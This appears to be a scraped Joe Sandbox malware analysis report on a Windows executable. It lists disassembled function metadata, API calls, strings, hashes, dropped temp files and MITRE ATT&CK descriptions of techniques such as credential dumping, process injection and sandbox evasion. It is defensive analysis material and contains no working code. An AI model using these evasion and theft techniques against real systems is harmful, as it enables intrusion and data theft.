Instruction Fuzzy Hash: F2E02B42205261109231227BACC197F5A89DFC97717101C2FF985C23E6EA9CCD9193A8

Function 004C0B15 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 28windowCOMMON

Download Yara Rule

APIs

MessageBoxW.USER32(00000000,Error allocating memory.,AutoIt,00000010), ref: 004C0B23

Strings

AutoIt, xrefs: 004C0B17
Error allocating memory., xrefs: 004C0B1C

Memory Dump Source

Source File: 00000000.00000002.1333145926.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true

Associated: 00000000.00000002.1333124285.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333285619.00000000004FC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333285619.0000000000522000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333353656.000000000052C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333397287.0000000000534000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_460000_KcSzB2IpP5.jbxd

Similarity

API ID: Message
String ID: AutoIt$Error allocating memory.
API String ID: 2030045667-4017498283
Opcode ID: eaf4284ce34e0ccdfff585170e7f10a67c172337532ad2d488039c44a5bfdd1e
Instruction ID: 03c6d87fa238c674838fc22aed8cee193b2f7ca4bf6046ece4ef04500503a4b7
Opcode Fuzzy Hash: eaf4284ce34e0ccdfff585170e7f10a67c172337532ad2d488039c44a5bfdd1e
Instruction Fuzzy Hash: 13E0D83128431C2AD22036967D43FD97A848F05B15F10442FF748955C39BE9649086ED

Function 00480D42 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 22COMMON

Download Yara Rule

APIs

Part of subcall function 0047F7C9: InitializeCriticalSectionAndSpinCount.KERNEL32(?,00000000,?,00480D71,?,?,?,0046100A), ref: 0047F7CE

IsDebuggerPresent.KERNEL32(?,?,?,0046100A), ref: 00480D75
OutputDebugStringW.KERNEL32(ERROR : Unable to initialize critical section in CAtlBaseModule,?,?,?,0046100A), ref: 00480D84

Strings

ERROR : Unable to initialize critical section in CAtlBaseModule, xrefs: 00480D7F

Memory Dump Source

Source File: 00000000.00000002.1333145926.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true

Associated: 00000000.00000002.1333124285.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333285619.00000000004FC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333285619.0000000000522000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333353656.000000000052C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333397287.0000000000534000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_460000_KcSzB2IpP5.jbxd

Similarity

API ID: CountCriticalDebugDebuggerInitializeOutputPresentSectionSpinString
String ID: ERROR : Unable to initialize critical section in CAtlBaseModule
API String ID: 55579361-631824599
Opcode ID: 81f8d006a0ea99a08693848908a3696fdf0b3203b2d6f0852f410e7f6a2c01a6
Instruction ID: f89ebf4e95af58241f27939572cf08a2b276b31dcb01e88c300f44e812c7d28d
Opcode Fuzzy Hash: 81f8d006a0ea99a08693848908a3696fdf0b3203b2d6f0852f410e7f6a2c01a6
Instruction Fuzzy Hash: 06E06D702007018BD370AFB9E54435A7BE4AF00744F008D6EE486C6751EBB8E44CCB99

Function 0047E398 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 21COMMON

Download Yara Rule

APIs

__Init_thread_footer.LIBCMT ref: 0047E3D5

Strings

0%S, xrefs: 0047E3B5
8%S, xrefs: 0047E3CA

Memory Dump Source

Source File: 00000000.00000002.1333145926.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true

Associated: 00000000.00000002.1333124285.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333285619.00000000004FC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333285619.0000000000522000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333353656.000000000052C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333397287.0000000000534000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_460000_KcSzB2IpP5.jbxd

Similarity

API ID: Init_thread_footer
String ID: 0%S$8%S
API String ID: 1385522511-40109914
Opcode ID: dd2f4a2247fdcd1de087937e5a1b81a9b237accdba59c8f3488e8f4163188fe6
Instruction ID: b2844bb5ca6ecff11015a4edfdb0b4712534429e1d0c18c44f27dd441a3b79c8
Opcode Fuzzy Hash: dd2f4a2247fdcd1de087937e5a1b81a9b237accdba59c8f3488e8f4163188fe6
Instruction Fuzzy Hash: 39E02632410D10CBC604E75AB858BCC3391BB0C324F1043EBEA46CF3D19B386A45A74D

Function 004BD21C Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 17timeCOMMON

Download Yara Rule

APIs

GetLocalTime.KERNEL32(?), ref: 004BD220

Strings

%.3d, xrefs: 004BD22B
X64, xrefs: 004BD2A8

Memory Dump Source

Source File: 00000000.00000002.1333145926.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true

Associated: 00000000.00000002.1333124285.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333285619.00000000004FC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333285619.0000000000522000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333353656.000000000052C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333397287.0000000000534000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_460000_KcSzB2IpP5.jbxd

Similarity

API ID: LocalTime
String ID: %.3d$X64
API String ID: 481472006-1077770165
Opcode ID: dab30b8978728b7d9a30a307915fdee1ab4b8703097e318865dac6851528d088
Instruction ID: cf946502a4b79e2695c83b52821bd7e4fa2578803a4cb7fa96f105125055cd15
Opcode Fuzzy Hash: dab30b8978728b7d9a30a307915fdee1ab4b8703097e318865dac6851528d088
Instruction Fuzzy Hash: 99D01261C09158EACB54D6D0DD858F9B77CFF18301F5084E7F90A91040F62CD50AAB7B

Function 004F2356 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15windowCOMMON

Download Yara Rule

APIs

FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 004F236C
PostMessageW.USER32(00000000), ref: 004F2373

Part of subcall function 004CE97B: Sleep.KERNEL32 ref: 004CE9F3

Strings

Shell_TrayWnd, xrefs: 004F2365

Memory Dump Source

Source File: 00000000.00000002.1333145926.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true

Associated: 00000000.00000002.1333124285.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333285619.00000000004FC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333285619.0000000000522000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333353656.000000000052C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333397287.0000000000534000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_460000_KcSzB2IpP5.jbxd

Similarity

API ID: FindMessagePostSleepWindow
String ID: Shell_TrayWnd
API String ID: 529655941-2988720461
Opcode ID: c8f681140aae2281313c3ea4d68c9b909df6c68f6623fcd9828b43985c5c334c
Instruction ID: f1a306a231efd257c79d5580c6d41a30d3eaf545f6b629366410b3ccb432dfaf
Opcode Fuzzy Hash: c8f681140aae2281313c3ea4d68c9b909df6c68f6623fcd9828b43985c5c334c
Instruction Fuzzy Hash: 52D0A972380320BAE2A8A331AC4FFC66A14AB01B00F00092A7201EA0D0C9B0A810CA08

Function 004F2322 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15windowCOMMON

Download Yara Rule

APIs

FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 004F232C
PostMessageW.USER32(00000000,00000111,00000197,00000000), ref: 004F233F

Part of subcall function 004CE97B: Sleep.KERNEL32 ref: 004CE9F3

Strings

Shell_TrayWnd, xrefs: 004F2325

Memory Dump Source

Source File: 00000000.00000002.1333145926.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true

Associated: 00000000.00000002.1333124285.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333285619.00000000004FC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333285619.0000000000522000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333353656.000000000052C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333397287.0000000000534000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_460000_KcSzB2IpP5.jbxd

Similarity

API ID: FindMessagePostSleepWindow
String ID: Shell_TrayWnd
API String ID: 529655941-2988720461
Opcode ID: 6019357f7a84438b84029cc559912fac7143df59786d09ce2f6733028e1f217f
Instruction ID: e307092c3350c2b64fe3480849b00516644da8178e47324262654202725ef067
Opcode Fuzzy Hash: 6019357f7a84438b84029cc559912fac7143df59786d09ce2f6733028e1f217f
Instruction Fuzzy Hash: DBD01276394324B7E6A8B771ED4FFD67A14AF01B14F00492A7745EA1D0C9F4A811CA58

Description:	Adversaries may obtain and abuse credentials of existing accounts as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Compromised credentials may be used to bypass access controls placed on various resources on systems within the network and may even be used for persistent access to remote systems and externally available services, such as VPNs, Outlook Web Access, network devices, and remote desktop.Compromised credentials may also grant an adversary increased privilege to specific systems or access to restricted areas of the network. Adversaries may choose not to use malware or tools in conjunction with the legitimate access those credentials provide to make it harder to detect their presence.
Tactics:	Defense Evasion, Initial Access, Persistence, Privilege Escalation
Data Sources:	Logon Session: Logon Session Creation, Logon Session: Logon Session Metadata, User Account: User Account Authentication
Platforms:	Azure AD, Containers, Google Workspace, IaaS, Linux, macOS, Network, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may exploit software vulnerabilities in an attempt to elevate privileges. Exploitation of a software vulnerability occurs when an adversary takes advantage of a programming error in a program, service, or within the operating system software or kernel itself to execute adversary-controlled code. Security constructs such as permission levels will often hinder access to information and use of certain techniques, so adversaries will likely need to perform privilege escalation to include use of software exploitation to circumvent those restrictions.
Tactics:	Privilege Escalation
Data Sources:	Driver: Driver Load, Process: Process Creation
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may circumvent mechanisms designed to control elevate privileges to gain higher-level permissions. Most modern systems contain native elevation control mechanisms that are intended to limit privileges that a user can perform on a machine. Authorization has to be granted to specific users in order to perform tasks that can be considered of higher risk. An adversary can perform several methods to take advantage of built-in control mechanisms in order to escalate privileges on a system.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, User Account: User Account Modification, Windows Registry: Windows Registry Key Modification
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Active Directory: Active Directory Object Modification, Command: Command Execution, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, User Account: User Account Metadata
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	Driver: Driver Load, File: File Modification, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Windows Registry: Windows Registry Key Modification
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of valid accounts, usernames, or email addresses on a system or within a compromised environment. This information can help adversaries determine which accounts exist, which can aid in follow-on behavior such as brute-forcing, spear-phishing attacks, or account takeovers (e.g., Valid Accounts ).
Tactics:	Discovery
Data Sources:	Command: Command Execution, File: File Access, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to identify the primary user, currently logged in user, set of users that commonly uses a system, or whether a user is actively using the system. They may do this, for example, by retrieving account usernames or by using OS Credential Dumping . The information may be collected in a number of different ways using other Discovery techniques, because user and username details are prevalent throughout a system and include running process ownership, file/directory ownership, session information, and system logs. Adversaries may use the information from [System Owner/User Discovery](https://attack.mitre.org/techniques/T1033) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report KcSzB2IpP5.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Yara Signatures

Memory Dumps

Unpacked PEs

Sigma Signatures

System Summary

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Spreading

Software Vulnerabilities

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

E-Banking Fraud

System Summary

Data Obfuscation

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Temp\8430F899

C:\Users\user\AppData\Local\Temp\aut5F50.tmp

C:\Users\user\AppData\Local\Temp\bezzo

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Rich Headers

Data Directories

Sections

Resources

Imports

Windows Analysis Report
KcSzB2IpP5.exe

Function 004642DE Relevance: 21.2, APIs: 9, Strings: 3, Instructions: 235
libraryloaderCOMMON

Function 004642A2 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 61
COMMON

Function 004A2BA5 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 62
COMMON

Function 00462CD4 Relevance: 19.3, APIs: 7, Strings: 4, Instructions: 53
windowregistryCOMMON

Function 004A065B Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 272
COMMONLIBRARYCODE

Function 0046344D Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 201
registryCOMMON

Function 00462B83 Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 63
windowregistryCOMMON

Function 00463170 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 145
windowtimeregistryCOMMON

Function 010266F8 Relevance: 10.7, APIs: 7, Instructions: 239
fileCOMMON

Function 00462C63 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 44
COMMON

Function 010264C8 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 147
fileCOMMON

Function 004D2947 Relevance: 7.8, APIs: 5, Instructions: 313
fileCOMMON

Function 00495AA9 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 186
COMMONLIBRARYCODE

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may target user email to collect sensitive information. Emails may contain sensitive data, including trade secrets or personal information, that can prove valuable to adversaries. Adversaries can collect or forward email from mail servers or clients.
Tactics:	Collection
Data Sources:	Application Log: Application Log Content, Command: Command Execution, File: File Access, Logon Session: Logon Session Creation, Network Traffic: Network Connection Creation
Platforms:	Google Workspace, Linux, macOS, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may collect data stored in the clipboard from users copying information within or between applications.
Tactics:	Collection
Data Sources:	Command: Command Execution, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may shutdown/reboot systems to interrupt access to, or aid in the destruction of, those systems. Operating systems may contain commands to initiate a shutdown/reboot of a machine or network device. In some cases, these commands may also be used to initiate a shutdown/reboot of a remote computer or network device via Network Device CLI (e.g. `reload` ).
Tactics:	Impact
Data Sources:	Command: Command Execution, Process: Process Creation, Sensor Health: Host Status
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre